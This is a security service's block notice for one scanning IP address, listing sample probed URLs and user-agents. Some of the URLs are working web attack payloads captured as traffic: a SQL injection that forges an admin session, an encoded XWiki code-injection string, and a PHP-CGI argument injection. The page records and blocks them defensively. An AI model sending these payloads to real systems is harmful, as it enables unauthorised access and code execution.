abuseip.org

IP 35.222.80.65 is currently blocked by the redirs.com anycast edge.

Reason: suspicious paths across 1 domains
Hits (last hour): 56
Unique targets hit: 1
Unique paths probed: 570
Detection count: 17
First seen: 2026-05-02 01:21:35 UTC
Last seen: 2026-05-02 02:21:56 UTC
Block expires: 2026-05-03 02:22:08 UTC

Sample paths probed

/boss/servlet/document
/pig/add-pig.php
/human.aspx?Username=SQL%27%3BINSERT+INTO+activesessions+(SessionID)+values+(%273D96BQVHLlaBL6GJ2hggGdLByzH%27);UPDATE+activesessions+SET+Username=(select+Username+from+users+order+by+permission+desc+limit+1)+WHERE+SessionID=%273D96BQVHLlaBL6GJ2hggGdLByzH%27;UPDATE+activesessions+SET+LoginName=%[email protected]%27+WHERE+SessionID=%273D96BQVHLlaBL6GJ2hggGdLByzH%27;UPDATE+activesessions+SET+RealName=%[email protected]%27+WHERE+SessionID=%273D96BQVHLlaBL6GJ2hggGdLByzH%27;UPDATE+activesessions+SET+InstId=%271234%27+WHERE+SessionID=%273D96BQVHLlaBL6GJ2hggGdLByzH%27;UPDATE+activesessions+SET+IpAddress=%2735.222.80.65%27+WHERE+SessionID=%273D96BQVHLlaBL6GJ2hggGdLByzH%27;UPDATE+activesessions+SET+LastTouch=%272099-06-10+09:30:00%27+WHERE+SessionID=%273D96BQVHLlaBL6GJ2hggGdLByzH%27;UPDATE+activesessions+SET+DMZInterface=%2710%27+WHERE+SessionID=%273D96BQVHLlaBL6GJ2hggGdLByzH%27;UPDATE+activesessions+SET+Timeout=%2760%27+WHERE+SessionID=%273D96BQVHLlaBL6GJ2hggGdLByzH%27;UPDATE+activesessions+SET+ResilNode=%2710%27+WHERE+SessionID=%273D96BQVHLlaBL6GJ2hggGdLByzH%27;UPDATE+activesessions+SET+AcctReady=%271%27+WHERE+SessionID=%273D96BQVHLlaBL6GJ2hggGdLByzH%27%23
/CFIDE/adminapi/base.cfc?method
/moveitisapi/moveitisapi.dll?action=m2
/index.php
/machine.aspx
/PhoneBackup/9FGJolUf.php
/file-manager/backend/makefile
/file-manager/
/bin/view/%22%5d%5d%20%7b%7b%61%73%79%6e%63%20%61%73%79%6e%63%3d%22%74%72%75%65%22%20%63%61%63%68%65%64%3d%22%66%61%6c%73%65%22%20%63%6f%6e%74%65%78%74%3d%22%64%6f%63%2e%72%65%66%65%72%65%6e%63%65%22%7d%7d%7b%7b%70%79%74%68%6f%6e%7d%7d%70%72%69%6e%74%28%33%37%32%34%33%34%38%20%2a%20%38%34%37%33%33%33%34%29%7b%7b%2f%70%79%74%68%6f%6e%7d%7d%7b%7b%2f%61%73%79%6e%63%7d%7d?sheet=SkinsCode.XWikiSkinsSheet&xpage=view
/guestaccess.aspx
/PhoneBackup/9FGJolUf.php?input=M0Q5NkJCRm42b1lIaHJCNTUxc0ZnTlhvT2x1
/
/asyncrenderer/%7B%7Burl%7D%7D?clientId={{id}}&timeout=500&wiki=xwiki
/?PHPRC=/dev/fd/0
/api/server/version
/sitecore_xaml.ashx/-/xaml/Sitecore.Xaml.Tutorials.Styles.Index
/loadfile.lp?pageid=Configure
/api/users

Sample User-Agents

Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Safari/114.0 Safari/537.36
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3
Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
AVAYA
Mozilla/5.0 (Kubuntu; Linux i686; rv:133.0) Gecko/20100101 Firefox/133.0
Mozilla/5.0 (Ubuntu; Linux x86_64; rv:132.0) Gecko/20100101 Firefox/132.0
Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Mozilla/5.0 (Debian; Linux i686; rv:120.0) Gecko/20100101 Firefox/120.0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.2 Safari/605.1.15
Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
Mozilla/5.0 (Debian; Linux x86_64; rv:124.0) Gecko/20100101 Firefox/124.0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
python-requests/2.26.0
Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/116.0
Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36

What does this mean?

This address sent traffic that the redirs.com edge classified as automated abuse — typically WordPress/PHP exploit scanning, credential file probing (.env, .git, .aws/), or mass-domain enumeration. The block is automatic and time-limited (24 hours from last detection).

If you believe this is a false positive, contact [email protected] with the IP and the timestamps above.